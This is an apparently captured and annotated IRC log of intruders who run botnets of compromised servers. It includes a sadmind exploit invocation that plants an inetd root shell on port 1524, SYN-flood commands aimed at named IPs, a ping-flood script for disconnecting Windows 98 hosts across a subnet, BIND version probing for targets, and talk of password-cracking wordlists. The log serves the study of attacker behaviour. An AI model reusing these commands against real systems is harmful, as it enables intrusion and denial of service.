:D1ck :i`ll get 32 more bots tommorow
:D1ck ::)
:D1ck :oye
:D1ck :cant access example.net
:J4n3 :huh ?
:J4n3 :its working fine
:J4n3 :www.example.net
:D1ck :hehe
:D1ck :i tried
:D1ck :permission denied
:J4n3 :acha wait acha = ok, or good
:D1ck ::)
:J4n3 :D1ck try now
:D1ck :ok
:D1ck :brb
:J4n3 :kkzkk
:J4n3 :hiall nick y00z
:hiall
:D1ck :J4n3
:D1ck :there?
:D1ck :just got back
:D1ck :.add D1ck * D1ck 100 1 4
NOTICE D1ck :Handle D1ck is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :kaos1299 nick link
:D1ck :kaos2440 weener
:D1ck :kaos452 nick queer
:D1ck :kaos6065 nick wtf
:kaos6065
:D1ck :kaos6567 nick ping
:D1ck :kaos6927 nick smurf6
:kaos6927
:D1ck :kaos7950 nick rofl
:D1ck :%kaos7950 nick hierachy
:D1ck :kaos93 nick anarchy^
:D1ck :kaos9719 nick ultralame
:kaos9719
:D1ck :kaos_ nick host-l
:kaos_
:D1ck :kaos__ nick software
:kaos__
:D1ck :kaos___ nick oracle
:kaos___
:D1ck :kaos___ nick java
:D1ck :kaos____ nick argv[1]
:kaos____
:D1ck :kaos_____ nick dotcom
:D1ck :brb
:J4n3 :op me
:J4n3 :op me
:J4n3 :op me
:J4n3 :op me
:J4n3 :JAVED thanx :p
:J4n3 :tryin some more :p brb
:D1ck :.add D1ck * D1ck 100 1 4
NOTICE D1ck :Handle D1ck is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :_aos_____ nick lagged
:_aos_____
:D1ck :___s_____ nick xinetd
:___s_____
:D1ck :kaos1299 nick tsmurf
:kaos1299
:D1ck :kaos2440 nick HISTFILE
:kaos2440
:D1ck :kaos3708 nick cunt`
:kaos3708
:D1ck :kaos452 nick whore-
:D1ck :kaos6567 nick tumble
:D1ck :kaos7056 nick debain
:kaos7056
:D1ck :kaos7950 nick PHAT
:kaos7950
:D1ck :kaos891 nick nEtbSd
:kaos891
:D1ck :kaos9379 nick solaris
:D1ck :kaos_ nick unix-r
:D1ck :kaos__ nick slackware
:kaos_
:D1ck :kaos____ nick romance
:kaos____
:D1ck :kaos_____ nick ZoRRo^
:kaos_____
:D1ck :kaos4230 nick [A]]]
:kaos4230
:D1ck :kaos452 nick [b]]]
:kaos452
:D1ck :kaos6511 nick gb
:kaos6511
:D1ck :kaos9379 nick heat
:D1ck :%_aos_____ nick kr-subnet
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :.add D1ck * D1ck 100 1 4
NOTICE D1ck :Handle D1ck is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :_aos_____ nick jang
:_aos_____
:D1ck :.add D1ck * D1ck 100 1 4
NOTICE D1ck :Handle D1ck is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:kaos9379
:D1ck :kaos1024 nick pop3
:D1ck :kaos2922 nick imapd
:kaos2922
:D1ck :kaos3854 nick syko
:D1ck :kaos4752 nick bitch_
:kaos4752
:D1ck :kaos3854 nick sykoseal
:kaos3854
:D1ck :__os_____ nick xperience
:D1ck :_________ nick line
:_________
:D1ck :_________ nick line
:D1ck :_________ nick linely
:D1ck :wtf
:D1ck :__os_____ nick SEX
:__os_____
:D1ck :.add D1ck * D1ck 100 1 4
NOTICE D1ck :Handle D1ck is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:kaos_
:D1ck :J4n3
:D1ck :J4n3
:J4n3 :fuck
:J4n3 :fuck
:D1ck :fuck?
:D1ck Sp07 :Bitch-X BaBy
:J4n3 :thanx :P
:J4n3 :Haji bana diya betay betay Ok made it boy
:D1ck :hehe come with yure ip i`ll add u to the new 40 bots
:D1ck :i owned and trojaned 40 servers of linux in 3 hours
:D1ck ::)))))
:J4n3 :heh
:J4n3 :damn
:D1ck :heh
:J4n3 :107 bots
:D1ck :yup
:J4n3 :wait brb
:D1ck :105 :P
:J4n3 :back
:D1ck :kewl
:D1ck :one sec
:J4n3 :kkz
:D1ck :.add J4n3 * J4n3 100 1 4
NOTICE D1ck :Handle J4n3 is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :.say hehe
PRIVMSG :Ott0 :hehe :anker :hehe :sshd :hehe :grep :hehe :jolt` :hehe :le :hehe :grep-v :hehe :netra :hehe :DEATHaCeS :hehe :Tota1KaaS :hehe :k-rad- :hehe :inetd-s :hehe :rpcbind :hehe :nohup :hehe :IgVip :hehe :save :hehe :Nine-mm :hehe :Animator_ :hehe :|ssh| :hehe :bevelz :hehe :spl1terz :hehe :jupe_ :hehe :wise :hehe :host-t-ns :hehe :s3ga :hehe :jupe2-bot :hehe :thor` :hehe :deb1an :hehe :w0lf_ :hehe :ttys1 :hehe :\dev\idle :hehe :slack :hehe :init-tab :hehe :cr4cked :hehe :Azz-Man :hehe :s1ack :hehe :Sun- :hehe :sximap :hehe :rewter :hehe :redcap :hehe :lickerz :hehe :host-l :hehe :software
:hehe :DoS_ :hehe :pr0be- :hehe :des|re :hehe :satan^666 :hehe :digi-x :hehe :pathanb0t :hehe :b3473r :hehe :pimpX :hehe :d1g1tal :hehe :k-r4d :hehe :t0sh1ba :hehe :jupah :hehe :jupe-bot :hehe :CyneX :hehe :OngHome :hehe :ath0 :hehe :ath0_ :hehe :obsleet :hehe :kaos___ :hehe :unix-r :hehe :gb :hehe :heat :hehe :line :hehe :romance :hehe :wtf :hehe :jang :hehe :kaos6567 :hehe :smurf6 :hehe :bitch_ :hehe :nEtbSd :hehe :cunt` :hehe :s0lar1s :hehe :r00t^666 :hehe :Nickless :hehe :imapd :hehe :kaos__ :hehe :peniswise :hehe :VsnL2 :hehe [note from Saumil: this system is actually in India - in Bangalore. VSNL is a nationwide ISP.] :[A]]] :hehe :kaos1024 :hehe :[b]]] :hehe :sykoseal :hehe :debain :hehe :SEX :hehe :ZoRRo^ :hehe :lagged :hehe :PHAT :hehe :xinetd :hehe :argv[1] :hehe :tsmurf :hehe :ultralame :hehe
:J4n3 :lol
:J4n3 :.say y0 y0
:tr1cks :y0 y0 :Animator_ :y0 y0 :|ssh| :y0 y0 :bevelz :y0 y0 :spl1terz :y0 y0 PRIVMSG :Nine-mm :y0 y0 :wise :y0 y0 :host-t-ns :y0 y0 :deb1an :y0 y0 :s1ack :y0 y0 :sximap :y0 y0 :\dev\idle :y0 y0 :r00t^666 :y0 y0 :rewter :y0 y0 :Azz-Man :y0 y0 :Sun- :y0 y0 :w0lf_ :y0 y0 :s0lar1s :y0 y0 :redcap :y0 y0 :slack :y0 y0 :init-tab :y0 y0 :cr4cked :y0 y0 :ttys1 :y0 y0 :Ott0 :y0 y0 :jolt` :y0 y0 :pr0be- :y0 y0 :des|re :y0 y0 :digi-x :y0 y0 :pathanb0t :y0 y0 :chill3r :y0 y0 :jupe2-bot :y0 y0 :s3ga :y0 y0 :software :y0 y0 :thor` :y0 y0 :host-l :y0 y0 :DoS_ :y0 y0 :anker :y0 y0 :sshd :y0 y0 :grep :y0 y0 :le :y0 y0 :grep-v :y0 y0 :netra :y0 y0 :DEATHaCeS :y0 y0 :Tota1KaaS :y0 y0 :k-rad- :y0 y0 :inetd-s :y0 y0 :nohup :y0 y0 :IgVip :y0 y0 :save :y0 y0 :OngHome :y0 y0 :ath0 :y0 y0 :lickerz :y0 y0 :var1ant :y0 y0 :ath0_ :y0 y0 :jupah :y0 y0 :b3473r :y0 y0 :pimpX :y0 y0 :d1g1tal :y0 y0 :k-r4d :y0 y0 :t0sh1ba :y0 y0 :kaos___ :y0 y0 :unix-r :y0 y0 :gb :y0 y0 :heat :y0 y0 :[b]]] :y0 y0 :line :y0 y0 :sykoseal :y0 y0 :tsmurf :y0 y0 :lagged :y0 y0 :ultralame :y0 y0 :ZoRRo^ :y0 y0 :jang :y0 y0 :obsleet :y0 y0 :kaos6567 :y0 y0 :smurf6 :y0 y0 :bitch_ :y0 y0
:romance :y0 y0 :SEX :y0 y0 :wtf :y0 y0 :xinetd :y0 y0 :argv[1] :y0 y0 :cunt` :y0 y0 :Nickless :y0 y0 :kaos1024 :y0 y0 :imapd :y0 y0 :kaos__ :y0 y0 :debain :y0 y0 :peniswise :y0 y0 :PHAT :y0 y0 :jupe-bot :y0 y0 :CyneX :y0 y0 :VsnL2 :y0 y0 :[A]]] :y0 y0 :nEtbSd :y0 y0
:D1ck :errrr
:D1ck :uplam taplam karta tha you're dinking around
:D1ck :kity pai kity pai ji eye jo [some babbling - ending with G I Joe]
:D1ck :macdonalds may hai kuch baaat is there any talk of macdonalds?
:J4n3 :lol
:oracle :hehe
:oracle :y0 y0
:J4n3 :wait ek second keliye channel karachi bejtha hon inko, no one is there right now, zara bharam wait for one second, sending them to channel to karachi, no one is there right now, for a little
:Vamp|re` tum channel pe raaj karo :p well go ahead and rule the channel :p
:J4n3 :aur kithnay chaiyen ? how many more do you want?
:Vamp|re` aab kush ho gaay are you happy now?
:KILLER1?:abey yaar yeh emechs hain saarey!? hey dude are these emechs all there?
:KILLER1:abey yaar yeh emechs hain saarey!
:Vamp|re`:hamain apn apata nahi chaal raha in bot ke bech main we cannot figure out ourselves in these bots? (i dont know if i could get the accurate transation on this one)
:KILLER1 :baney howey hain emech sey made from emech
:D1ck :hehehe
:D1ck :sure
:D1ck :they are secure
:D1ck :they are secured
:D1ck :i patched all those fucking hosts :P
:J4n3 :haha who tho hobee gaya haha that has already been done
:D1ck :and i bet naveed couldnt own bind
:J4n3 :kub ka join karkay part karwa diya since long made him part after joining
:D1ck :haha
:D1ck :lol
:D1ck :kewl
:J4n3 :hhahha
:D1ck :hehe
:J4n3 :usko bind ka patha hee nahin he doesnt even know about bind
:D1ck :oye give me some indian class b
:D1ck :i`ll mass own
:J4n3 :bind ?
:D1ck :yep
:J4n3 :Vamp|re` yaar isko baksh day pehlay hina kay site ja chuka hai vampire, wish him well before he goes to hina's site
:D1ck :?
:J4n3 :oops
:D1ck :mujhay aik lafz nahin samhaj may aya i cant undertstand one thing
:D1ck :y0
:D1ck :u hyper ircer
:D1ck ::P
:J4n3_ ::)
:J4n3_ :ip resolve nahin huwa ip couldnt resolve
:D1ck :hehe
:D1ck :irc0p.org
:D1ck :?
:J4n3_ :heh yeah
:D1ck :J4n3 it's imp when u get back messsage me.
:J4n3 :abay i am ehre
:J4n3 :lol
:D1ck :ACTION is away: (sleep) [BX-MsgLog On]
:J4n3 :D1ck
:J4n3 :D1ck
:J4n3 :netsrvrcs.saha.ernet.in's named that errors on iquery is version: 8.1.1 [note : ernet.in is an Indian Educational and Research network (ERnet)]
:J4n3 :hp1.example.in's named that errors on iquery is version: 8.2.1
:J4n3 :hp2.example.in's named that errors on iquery is version: 8.2.1
:J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
:J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
:J4n3 :tnp.example.in's named that errors on iquery is version: 8.1.2
:J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
:J4n3 :192.168.151.3's named that errors on iquery is version: named 4.9.5-Rel+-
:D1ck :b0h
:D1ck ::)
:D1ck :errrrr
:D1ck :get me some domains
:D1ck :like
:J4n3 :hehe
:D1ck :kewl
:D1ck ::P
:J4n3 :scanning horahi ahi na in.log scanning is being done in in.log [note: would be worthwhile snagging that in.log file for IPs and scan results]
:D1ck :okie
:D1ck :hehe
:D1ck :oye
:J4n3 :yeah ?
:D1ck :how big is yure cracking file?
:D1ck :word lisT?
:J4n3 :humm 100 mb i think
:J4n3 :may be more not sure
:D1ck :wow
:D1ck :where did u get it?
:D1ck :i want it tew
:D1ck :i want it tew
:J4n3 :packetstorm :p
:D1ck :i want it tew
:D1ck :oki
:D1ck :;)
:J4n3 :ARGONG's Dictionary
:J4n3 :ARGON'S even
:J4n3 :oye 100 mb nahin hia yo 100mb is not there
:J4n3 :in zip fiel its 65 mb i think
:J4n3 :or 25 not sure but when u unzip its 234 mb
:D1ck :wow
:D1ck :please give me the exact url
:D1ck ::P
:D1ck ::P
:D1ck :i`ll download
:J4n3 :dont remember yaar, i downloaded it long ago
:D1ck :oh
:D1ck :;(
:J4n3 :but its in Archieve/wordlists
:J4n3 :thats what i remember
:D1ck :oh
:J4n3 :D1ck
:J4n3 :try to use Crack5
:D1ck :?
:J4n3 :its kewl
:J4n3 :and the best cracker
:D1ck :what's that?
:D1ck :send me
:D1ck :send me
:D1ck : /dcc
:J4n3 :i dont have it
:J4n3 :coz i couldn't configure it
:J4n3 :but u can get it from packetstorm
:D1ck :oh
:J4n3 :same Archieve cracks
:D1ck : okies
:D1ck :i will
:D1ck :i cant get in archieves
:D1ck :whats the url for archives?
:J4n3 :wait lemme check
:D1ck :packetstorm.securify.com/archieve?
:D1ck :?
:J4n3 :D1ck
:D1ck :?
:J4n3 :packetstorm.securify.com/assess.html
:J4n3 :check password crackers link in this page
:D1ck :oki
:D1ck :and wordlist?
:D1ck :i found it
:D1ck ::)
:D1ck :Read 65 KB of data, 6 KB/sec.
:D1ck :wow
:D1ck :6 KB
:D1ck ::)
:D1ck :man
:D1ck :tehere are 300 .gz
:D1ck :which one should i download?
:D1ck :name
:D1ck :?
:D1ck :???????
:D1ck :???????
:D1ck :?????
:D1ck :??????
:J4n3 :hhaha u mean wordlist ?
:J4n3 :look for Argon
:D1ck :yep
:D1ck :oiki
:D1ck :there is no argon
:D1ck :?
:D1ck :????????
:D1ck :??????????????
:D1ck :?
:D1ck :???????????????????????????????????????????????????
:D1ck :???????????????????????????????????????????????????
:D1ck :???????????????????????????????????????????????????
:D1ck :???????????????????????????????????????????????????
:D1ck :???????????????????????????????????????????????????
:D1ck :oye
:D1ck :J4n3
:D1ck :u there?
:D1ck :i got d/c
:D1ck :world tel roc
:D1ck :world tel rox
:D1ck :OH MY GOD
:D1ck :10 K
:D1ck :OH GOD
:D1ck :6 K
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:kaos1024 :kaos__ :kaos6567
-=-= Day 07 June 10
:m4ry :YO
:m4ry :HEY
:m4ry :WAKE UP MORONS
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:D1ck :.add D1ck * D1ck 100 1 4
:D1ck :.save
:_pen :whats goin on?
:D1ck :nadda
:D1ck :bored
:_pen :em too
:_pen :i got my first legit shell
:D1ck :haha
:D1ck :cool
:D1ck :how much did u pay?
:_pen :nothing
:D1ck :.add D1ck * D1ck 100 1 4
:_pen :heh
:D1ck :.save
:D1ck :where had u bee/.
:D1ck :u hang in #amdx?
:_pen :no
:_pen :they are being gay
:D1ck :cool
:D1ck :hehe
:_pen :grid is mad cuz im friends with someone he hates
:_pen :therefor im not aloud in there
:D1ck :hahaha
:D1ck :grid's gay'
:D1ck :U HANG WITH DIZASYA
:D1ck :DIZSTA
:D1ck :HEH
:D1ck :i`ve hacked 30+ of his shells
:D1ck :he doesnt even know hwo to secure it
:D1ck :or secure a subnet
:D1ck :tons locally
:D1ck :_pen
:D1ck :dont hand over the key to any one
:D1ck :ok?
:_pen :ok
:D1ck :_pen: who gave u the key, btw?
:D1ck :m4ry??
:_pen :*** D1ck has joined #lecole
:_pen : j #k1dd13 neat22
:D1ck :oh
:_pen :)
:D1ck :h3h
:_pen :=)
:D1ck ::)
:D1ck :ok
:D1ck :what in the world are u doing in #deathaces?
:D1ck :heh
:_pen :what is it?
:D1ck :a channel for fun
:_pen :i just did a whois
:_pen :and saw someone in there
:_pen :and joined
:D1ck :heh kl
:_pen :a channel for fun == ?
:D1ck :welp
:D1ck :hey hang in for chatting etc
:D1ck ::)
:_pen :k
:D1ck ::)
:_pen :hey
:_pen :do u have the syntax
:_pen :for
:D1ck :yeah
:_pen :sadmind exploit
:_pen :?
:D1ck :lol
:D1ck :yes
:_pen :what is it
:D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p]
:_pen : what do i do for -c
:D1ck :heh
:D1ck :u dont know?
:_pen :no
:D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
:D1ck :that would open 1524
:_pen :%sp 0x00000000 offset 688 --> return address 0x000002b0
:_pen :[4]
:_pen :%sp 0x00000000 with frame length 4808 --> %fp 0x000012c8
:_pen :exploit failed; RPC succeeded and returned { 2, 343, "[1,1,1]
:_pen :
:_pen :" }
:D1ck :c==command
:_pen :wtf
:_pen :it seg faulted
:_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
:_pen :thats what i did
:_pen :heelo?
:D1ck :[Lag ??]
:D1ck :what did u ask
:D1ck :repeat again
:D1ck :i got d/c
:_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
:_pen :thats what i did
:_pen :and it seg faulted
:D1ck :dunno
:D1ck :brb
:Insekt :thanks
:D1ck :yep
:D1ck :np
:D1ck :mechnet
:Insekt :nice
:Insekt :it was in #flem for a little while right?
:Insekt :or some of them
:Insekt :even
:D1ck :?
:insekt` :?
:insekt` :what?
:D1ck :hehe
:insekt` :flem lost ops again
:insekt` :heh
:D1ck :shit
:D1ck :heh
:D1ck :i`ll fuck all of them
:insekt` :it happens like every week
:D1ck :to regain
:D1ck :i offfered them bots
:D1ck :but no no
:D1ck :dont listen to me
:insekt` :heh
:D1ck :heh
:insekt` :its always a good chan though
:D1ck :yep
:insekt` :with or without ops
:D1ck :;P
:insekt` :heh
:D1ck :;p
:insekt` :so, whats been going on?
:insekt` :hah
:insekt` :am join chan #enforcers
:D1ck :heh
:insekt` :elite
:insekt` :dammit
:insekt` :heh
:D1ck :ACTION is away: (SLEEP) [BX-MsgLog On]
:D1ck :cya
:D1ck :gave to sleep
:insekt` :see ya
-=- Day 08 June 11
:m4ry :.deop jupe
:m4ry :.up
:m4ry :wise op m4ry
:m4ry :wise deop jupe
:m4ry :.say hi
:kaos__ :hi
:kaos____ :hi
:kaos_____ :hi
:_aos_____ :hi
:kaos___ :hi
:jupe :hi
:m4ry :jupe part
:D1ck :kaos__ nick nutsack
:D1ck :kaos___ nick dumbly
:D1ck :%kaos____ nick rewted
:D1ck :kaos_____ nick bate
:D1ck :_aos_____ nick anarchy
:D1ck :kaos____ nick cutlose
:D1ck :.add D1ck * D1ck 100 1 4
:D1ck :.save
:D1ck :_aos_____ nick duke
:D1ck :J4n3
:D1ck ::)
:J4n3 :D1ck nick SeXyGuy19
:D1ck :there?
:D1ck :hahaa
:J4n3 :yeah :)
:D1ck : /nick SeXyGuy19
:J4n3 :heh
:D1ck ::)
:D1ck :hh
:D1ck :;)
:D1ck :cool bots?
:D1ck :.add J4n3 * J4n3 100 1 4
:D1ck :.save
:D1ck :oye
:D1ck :we have to change the key
:D1ck :.join #
:J4n3 :humm
:D1ck :heh
:D1ck :lagged
:D1ck :worldtel sucks.
:J4n3 :heh why change the key ?
:D1ck :oye
:D1ck :J4n3
:D1ck :load shells
:D1ck :we have to dos
:D1ck :i am ready with 4
:D1ck :u load 4-5
:D1ck :dos RR
:D1ck :and
:D1ck :Deadrat
:J4n3 :hermm
:D1ck :ok?????????
:J4n3 :wait
:D1ck :please
:D1ck :192.168.6.223
:D1ck :and
:D1ck :./syn 0 192.168.6.223 1 1024
:D1ck :ok just dos this 38 wala with 2 boxes
:D1ck :and the other with rest
:D1ck :coz i`m dosing it
:D1ck :./s2 0 192.168.6.223 1 1024
:J4n3 :humm ok
:D1ck :okies
:D1ck :thanks
:D1ck :me dosing too
:D1ck :./syn 0 192.168.6.223 1 1024
:D1ck :oye sun u dosing?
:D1ck :started?
:J4n3 :yup
:J4n3 :lagging badlay yaara lagging badly, dude
:D1ck :oye
:D1ck :he changed hosts
:D1ck : Signon by DeadRat
:D1ck :oye stop dos on him
:D1ck :and dos
:D1ck :node177190.example.edu
:J4n3 :hmm
:J4n3 :waito
:J4n3 :./syn 0 node177190.example.edu 1 1024
:D1ck :./syn 0 192.168.177.190 1 1024
:D1ck :nope ip
:J4n3 :yeah yeah
:D1ck :thanks
:D1ck ::)
:J4n3 ::O)
:D1ck :thanks J4n3
:D1ck :me also dosing
:D1ck :boh dossed
:D1ck :both
:D1ck ::)
:J4n3 :hehe
:D1ck :heh
:D1ckhack :.part
:D1ck :.join #
:D1ck :.join #
:J4n3 :oye what happened ?
:J4n3 :oey
:D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:J4n3 :oye shn1p3r
:J4n3 :D1ck reply man
:J4n3 :i'll tell u a kewl way :p
:J4n3 :new trick :p
:J4n3 :reboot windows heeh with no programz
:J4n3 :D1ck
:D1ckhack :.op
:D1ckhack :.up
:D1ck :J4n3
:D1ck ::)
:D1ck :sup baby
:J4n3 :u on winbl0ws ?
:D1ck :nope
:D1ck ::)
:D1ck :128 bots
:J4n3 :oh
:J4n3 :i c
:J4n3 :lol yeah
:J4n3 :oye i can reboot any win98 machine :p
:D1ck :kewl
:D1ck :0-day?
:J4n3 :hahaha no sploit
:D1ck :do u use ath0.c by th0m45?
:J4n3 :just a simple ping command :p
:D1ck :can d/c any one
:D1ck :hahahahaha
:D1ck :2b2b2b2000db
:D1ck :?
:J4n3 :no but it works only with zoltrix modem
:J4n3 :and it disconnects urself too :(
:J4n3 :noooooo
:J4n3 ::p
:D1ck :2b2b2b415448300d
:J4n3 :noooooooooooo
:D1ck :oh
:J4n3 ::p
:D1ck :send me the coce
:D1ck :i will make a shell script
:J4n3 :haha abay simple online command of ping
:J4n3 :and it will reboot any win98 machine or hang it
:D1ck :kewl
:D1ck :give me the ping command
:J4n3 :but
:J4n3 :works with linux only
:J4n3 :and if u do it with ur own box, it will kill u with lag
:J4n3 :do it from a linux rewt
:J4n3 :in 1 minute it will dc and hang the system
:J4n3 :command is
:J4n3 :ping -f -s 65000 :pPPpPp
:D1ck :kewl
:D1ck :wait
:J4n3 :ok but dont try it on me :/
:J4n3 ::/
:D1ck :#
:D1ck :if [ $#
:D1ck :echo " "
:D1ck :echo "[*] Usage $0 IP"
:D1ck :echo "[*] ping reboot any win 9.x machine by D1ck, Idea by J4n3."
:D1ck :echo " "
:D1ck :exit
:D1ck :else
:D1ck :ping -f -s 65000 $1
:D1ck :fi
:D1ck :kewl
:D1ck :?
:J4n3 :lol set
:J4n3 :tyte
:D1ck :give me some ips
:D1ck :hehehe
:D1ck :dont worry
:J4n3 :try it on 192.168.68.163
:D1ck :oye
:D1ck :i made a script
:D1ck :u can reboot ever user of a class c
:D1ck :with this
:D1ck :./reboot.sh 192.168.252
:J4n3 :oh no
:D1ck :will reboot ever uses using this
:D1ck :kewl?
:J4n3 :shit no
:J4n3 :wahi ping command ? the same ping command?
:D1ck :heheh
:D1ck :wait
:D1ck :i`m making it
:J4n3 :kewl kewl bana, phir syn and smurf kaa kaam khatam :P cool cool, make it, then syn and smurf are out of a job :P
:J4n3 :but bnc walon ka nahin hoga :( but it wont work on the bnc users :(
:J4n3 :unkay liye syn hee sahi hai for them syn is fine
:D1ck :yep
:D1ck :?
:D1ck :oye how many ppl know about it?
:J4n3 :no one
:J4n3 :except moi :p
:J4n3 :dont spread it :p
:J4n3 :i've seen it written somewhere in a txt of some sploit
:J4n3 :but its not common, and no one know about it yet
:D1ck :kewl
:D1ck :oye done
:D1ck :i`ll send u ina phew
:J4n3 :kewl kewl :P
:J4n3 :okies :)
:J4n3 :try it on some isp
:D1ck :yep
:D1ck :oye J4n3
:D1ck :give me some isp
:D1ck :which should i n3wk
:D1ck :?
:J4n3 :hmmm
:J4n3 :try satnet naa
:D1ck :?hahha
:D1ck :ok
:D1ck :192.168.2?
:D1ck :192.168.25/?
:D1ck :?
:J4n3 :hmm
:J4n3 :192.168.25.*
:D1ck :./rebootclass.sh 192.168.25.1
:J4n3 :kewl lets see
:D1ck :...............................................................................................................................................................................................................................................................................................................................................................
:D1ck :one sec
:D1ck :let me see
:D1ck :i think i`ll have to write a looop
:D1ck :but lets see
:J4n3 :hmm ok
:D1ck :ooops
:D1ck :i frgot to chmod +x a file hehe
:D1ck :fixed
:J4n3 ::??
:J4n3 :lol
:J4n3 :ok
:D1ck :done
:D1ck :lets see if they ping out
:D1ck :join #delusion
:D1ck :and see
:D1ck :?P
:J4n3 :ok wait
:D1ck :oye
:D1ck :are u sure this command works?
:D1ck :give me some ip
:D1ck :i`ll d.c them
:J4n3 :100 %
:J4n3 ::p
:J4n3 :when i try it on a single ip, it goes down 101 %
:J4n3 :haven't found one who didn't go offline
:D1ck :oye
:D1ck :u there?
:D1ck :J4n3
:D1ck :fucking worldtel
:D1ck :fucking worldtel
:D1ck :fucking worldtel
:D1ck :fucking worldtel
:D1ck :fucking worldtel
:D1ck :fucking worldtel
:D1ck :sux muh azz
:D1ck ::)
:D1ck :'az''
:D1ck :accept the script
:D1ck :hmmm
:D1ck :?
:D1ck :J4n3
:D1ck :world tel
:D1ck :sux
:D1ck :J4n3
:D1ck :NEW KEY J4n3
:D1ck :get it
:D1ck ::)
:D1ckhack :ACTION is away: (MOVIE #@$@
:D1ck :ACTION is away: (MOVIE #@$@
:D1ck :pnp sux
:D1ck :pnp sux
:J4n3 :lol still ?
:D1ck :when i double click i want the chaninfo with topic bans etc
:D1ck :it gives me a input box, to write topic
:D1ck :blah
:D1ck :heh
:J4n3 :HAHAHAHAH
:J4n3 :lol
:D1ck ::P
:J4n3 :J4n3
:J4n3 :J4n3
:D1ck :(@az): and what's with the topic
:D1ck :*** BigPoppa changes topic to 'booop'
:D1ck :(@az): owning g|nger` ?
:D1ck :*** DeadRat sets mode: +o h4r33
:D1ck :l3w|
:J4n3 :hehe
:D1ck :(symetrix`): im a korjap
:D1ck :(@h4r33): 24.143.24.1
:D1ck :(@h4r33): its my uplink and its unkillable
:D1ck :(@h4r33): sure you can kill me but you can't take the uplink down
:D1ck :(@h4r33): HAHAAAAAAAAAAAA
:D1ck :(@madcow-): why would you want to kill your uplink?
:D1ck :* symetrix` munches on some rice
:D1ck :(@h4r33): mother fuckin uplink is DEAD
:D1ck :he thinks dosing is 'COO'L' *shrug*
:J4n3 :lol
:D1ck :(@BigPoppa): diz
:D1ck :(@BigPoppa): has there ever been something you couldnt kill?
:D1ck :(@madcow-): me
:D1ck :(@madcow-): :)
:D1ck :(@h4r33): not yet
:D1ck :oye
:D1ck :come to windows
:D1ck :and i`m loading up 30+ of my shells
:D1ck :to dos
:D1ck :u load too
:J4n3 :i am in windows
:J4n3 :and ready to dos
:D1ck :if u want
:J4n3 :just give me the IP
:D1ck :if u dont we will do it another day
:D1ck ::)
:J4n3 :i have 11 boxes ready
:D1ck :kewl
:D1ck :let me load up
:J4n3 :kkz
:D1ck :how many boxes?
:J4n3 :11
:D1ck :oki
:D1ck :[*] Loading Boxens....
:J4n3 :heh
:J4n3 :ip ?
:J4n3 :my 11 boxes r enuff to take down anyone :p
:D1ck :lol
:D1ck ::)
:J4n3 ::)
:J4n3 :ogin: root
:J4n3 :Password:
:J4n3 :Sun Microsystems Inc. SunOS 5.7 Generic October 1998
:J4n3 :These are the times that try anybody's soul.
:J4n3 :A bird in the hand can bite.
:J4n3 :You have mail.
:J4n3 :# cd /dev/".. "/sun2/packet
:J4n3 :#
:D1ck :system.example.com
:D1ck :oye
:D1ck :do this
:D1ck :dig @system.example.com version.bind chaos txt
:D1ck :and paste me what u get
:J4n3 :i'm on windows
:J4n3 :where ??
:J4n3 :from any box ?
:D1ck :oh
:D1ck :try if dig works
:J4n3 :wait
:J4n3 :VERSION.BIND.
0S CHAOS TXT "8.2.1"
:J4n3 :; <<>> DiG 8.2 <<>> @system.example.com version.bind chaos txt
:J4n3 :;
:J4n3 :;; FROM: gujarat to SERVER: system.example.com 192.168.244.99
:J4n3 :;; Total query time: 467 msec
:J4n3 :;; ANSWER SECTION:
:J4n3 :;; version.bind, type = TXT, class = CHAOS
:J4n3 :;; QUERY SECTION:
:J4n3 :;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
:D1ck :LOL
:J4n3 :;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10
:D1ck :LOL
:D1ck :LOL
:D1ck :LOL
:D1ck :LOL
:D1ck :LOL
:J4n3 :;; got answer:
:D1ck :I WILL OWN IT
:J4n3 :;; res options: init recurs defnam dnsrch
:J4n3 :; (1 server found)
:J4n3 :; (1 server found)
:J4n3 :hehe
:J4n3 :who's this ?
:D1ck :BWHAHAHAHAHA
:D1ck :h4r33^
:D1ck :i`ll own it
:D1ck :lamer cant even path his box
:J4n3 :kewl
:J4n3 :tight
:J4n3 :kar kar own kar do it, do it, own it
:D1ck :heh
:D1ck :he's such a lamer
:D1ck :let me reboot
:D1ck :brb
:D1ck :brb
:J4n3 :heh okies
:D1ck :oye
:D1ck :u there?
:J4n3 :yeah
:D1ck :my NS is getting 43503495-43-593 quries
:D1ck ::?(
:D1ck ::(
:J4n3 :huh
:J4n3 ::/
:D1ck :lol
:J4n3 :what's the chances ?
:D1ck :100% if my NS is working like yesterday
:D1ck :shit i think named is dead
:J4n3 :oh :(
